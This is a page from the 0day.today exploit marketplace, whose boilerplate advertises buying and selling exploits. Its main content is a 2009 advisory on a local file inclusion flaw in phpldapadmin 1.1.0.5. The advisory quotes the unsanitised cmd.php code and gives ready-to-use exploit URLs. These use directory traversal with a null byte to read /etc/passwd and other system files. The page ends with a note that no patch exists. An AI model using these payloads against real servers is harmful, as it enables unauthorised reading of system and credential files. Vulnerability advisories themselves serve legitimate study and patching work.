0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpldapadmin Local File Inclusion
================================= phpldapadmin Local File Inclusion ================================= ######################################################################## # PHPLDAPADMIN LOCAL FILE INCLUSION ######################################################################## author : ipsecs website : http://ipsecs.com Date : December, 10th, 2009 -[i]- Description "Phpldapadmin is web based LDAP client which provides easy, anywhere-accessible, multi-language administration for LDAP server." http://phpldapadmin.sourceforge.net vulnerable version: phpldapadmin 1.1.0.5 Ubuntu 8.10 Debian 5.0 Other version may be affected -[ii]- Vulnerable Code Vulnerable code is found in cmd.php which doesn't sanitize URI parameter provided by user input. line 10 $www['cmd'] = get_request('cmd','REQUEST'); line 22-27 if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php')) $file = HOOKSDIR.$www['cmd'].'.php'; elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php')) $file = HTDOCDIR.$www['cmd'].'.php'; line 38-39 if ($file) include $file; Attacker may view any arbitrary files trough 'cmd' parameter in URI request. -[iii]- Exploit http://server/phpldapadmin/cmd.php?cmd=../../../../etc/passwd%00 http://server/phpldapadmin/cmd.php?cmd=../../../../issue%00 -[iv]- Fix Sanitize $file before being included. Unfortunaltely there is no working patch at this time. # 0day.today [2024-11-15] #